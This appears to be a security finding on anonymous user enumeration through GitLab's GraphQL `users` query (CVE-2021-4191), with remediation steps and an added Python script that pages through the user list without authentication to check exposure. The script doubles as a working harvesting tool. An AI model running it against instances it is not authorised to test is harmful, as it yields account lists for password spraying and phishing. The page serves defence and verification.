GitLab user disclosure
Description
The GitLab GraphQL API (POST /api/graphql) can answer the `users` query for a client that presents no session cookie and no token. On an affected instance an unauthenticated attacker can page through that connection and retrieve, for every registered account, the username, display name, internal user ID and account state, together with any profile fields the user has made public (such as a public email address, avatar and profile URL); the same query confirms whether a guessed username exists. On self-managed GitLab this issue was fixed upstream as CVE-2021-4191 (security releases 14.8.2, 14.7.4 and 14.6.5, February 2022), after which the `users` query requires authentication whenever the instance restricts the Public visibility level; an instance older than that, or one that still allows Public visibility, answers it. A complete user list is valuable reconnaissance: it feeds password spraying and credential stuffing against the sign-in endpoint and gives phishing and social-engineering campaigns verified names and, where users have published them, email addresses.
Remediation
Apply the upstream fix first, then tighten the configuration around it:
1. Upgrade to a GitLab release that contains the fix (14.8.2, 14.7.4, 14.6.5 or later). Without the patched code none of the settings below reliably stops the query.
2. In Admin Area > Settings > General > Visibility and access controls, add Public to the restricted visibility levels if the instance does not need publicly visible projects. On a patched version this is the setting that makes the anonymous `users` query fail; if the instance legitimately hosts public projects, the user list is by design readable by anyone and the remaining steps only limit how fast it can be harvested.
3. In Admin Area > Settings > Network > User and IP rate limits, enable the unauthenticated API request limit. This slows and logs bulk harvesting but is a speed bump, not a fix: one page of the `users` connection returns up to 100 accounts.
4. If patching must wait, add a reverse-proxy rule that rejects requests to /api/graphql carrying neither a `_gitlab_session` cookie nor a GitLab token header (`PRIVATE-TOKEN` or `Authorization`). GitLab's own web UI calls /api/graphql with the session cookie, so a rule that blocks every request without a token header breaks the UI. The proxy can only check that a credential is present, not that it is valid, so an attacker who sends an arbitrary cookie value gets through to GitLab, which then treats the request as anonymous; treat the rule as a stopgap.
5. Restricting the `users` query itself to authenticated users is done in GitLab's application code (it is the upstream fix); there is no separate admin toggle for it, so the only controls are the version you run and the visibility setting in step 2.
6. If the instance is for internal use only, allowlist source IPs for the API paths at the proxy or firewall.
Additionally, audit existing user profiles: `publicEmail` is only returned when a user has set a public email in their profile settings, so ask users to leave it unset unless they need it, and make sure the administrator and service accounts publish none. After each change, repeat the unauthenticated query: it should be refused (an `errors` entry and/or a null `users` value), while the same query sent with a valid personal access token should still succeed for an authenticated user.
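The following script is an added example for this page (not GitLab code and not part of the original finding) that issues the anonymous `users` query described above, pages through the connection, and reports whether the instance is exposed; run it again after the remediation steps, with and without a personal access token, to verify the fix. It assumes GitLab's documented GraphQL field names (`id`, `username`, `name`, `publicEmail`, `state`, `pageInfo`), a page cap of 100, and that a refused query shows up as an `errors` entry, a null `users` value, or an HTTP 401/403. The sample response embedded in it is constructed, not captured from a real instance.

```python
"""
Unauthenticated check for the GitLab GraphQL `users` enumeration.

Added example; not GitLab code. Assumptions: UserCore field names as in
GitLab's GraphQL reference, pages capped at 100 nodes, and a refused query
surfacing as `errors`, a null `users` value, or an HTTP 401/403.
"""
import json
import sys
import urllib.request
from urllib.error import HTTPError

GRAPHQL_PATH = "/api/graphql"
PAGE_SIZE = 100  # GitLab caps `first` at 100 on most connections

# Constructed sample response (not from a real instance) so that the parsing
# can be exercised offline when the script is run without a URL.
SAMPLE_RESPONSE = {
    "data": {
        "users": {
            "nodes": [
                {"id": "gid://gitlab/User/1", "username": "root",
                 "name": "Administrator", "publicEmail": None, "state": "active"},
                {"id": "gid://gitlab/User/2", "username": "alice",
                 "name": "Alice Example", "publicEmail": "alice@example.test",
                 "state": "active"},
            ],
            "pageInfo": {"hasNextPage": False, "endCursor": None},
        }
    }
}


def build_query(after=None):
    """GraphQL document plus variables for one page of the `users` connection."""
    return {
        "query": (
            "query($first: Int!, $after: String) {"
            " users(first: $first, after: $after) {"
            "  nodes { id username name publicEmail state }"
            "  pageInfo { hasNextPage endCursor }"
            " } }"
        ),
        "variables": {"first": PAGE_SIZE, "after": after},
    }


def parse_page(body):
    """Return (nodes, next_cursor, exposed) for one response body.

    `exposed` is False when the server refused the query (an `errors` entry or
    a null `users` value), which is what a patched instance with Public
    restricted returns to an anonymous client.
    """
    users = (body.get("data") or {}).get("users")
    if body.get("errors") or users is None:
        return [], None, False
    page = users.get("pageInfo") or {}
    cursor = page.get("endCursor") if page.get("hasNextPage") else None
    return users.get("nodes") or [], cursor, True


def fetch_page(base_url, payload, token=None):
    """POST one query. An HTTP error (e.g. 401 from a proxy rule) is folded
    into the same shape parse_page() understands."""
    req = urllib.request.Request(
        base_url.rstrip("/") + GRAPHQL_PATH,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "Accept": "application/json"},
    )
    if token:
        req.add_header("PRIVATE-TOKEN", token)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.load(resp)
    except HTTPError as exc:
        return {"errors": [{"message": f"HTTP {exc.code}"}]}


def enumerate_users(base_url, token=None, max_pages=50, fetch=fetch_page):
    """Walk the connection page by page; returns (usernames, exposed).

    `fetch` is injectable so the walk can be exercised against canned responses.
    """
    usernames, cursor, exposed = [], None, False
    for _ in range(max_pages):
        nodes, cursor, page_exposed = parse_page(fetch(base_url, build_query(cursor), token))
        exposed = exposed or page_exposed
        usernames.extend(n["username"] for n in nodes if n.get("username"))
        if cursor is None:
            break
    return usernames, exposed


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("offline demo on the constructed sample:", parse_page(SAMPLE_RESPONSE)[:2])
        sys.exit(0)
    token = sys.argv[2] if len(sys.argv) > 2 else None
    names, exposed = enumerate_users(sys.argv[1], token=token)
    if exposed:
        print(f"EXPOSED: {len(names)} users listed, e.g. {names[:5]}")
    else:
        print("query refused (errors / null users): not exposed to this client")
    sys.exit(1 if exposed else 0)
```

Run it as `python3 gitlab_users_check.py https://gitlab.example.test` (a hypothetical host) to test the anonymous path, and add a personal access token as a second argument to confirm that authenticated access still works after remediation. The exit code is 1 when the anonymous query succeeds, so the script can sit in a scheduled job that alerts if a future upgrade or settings change reopens the listing.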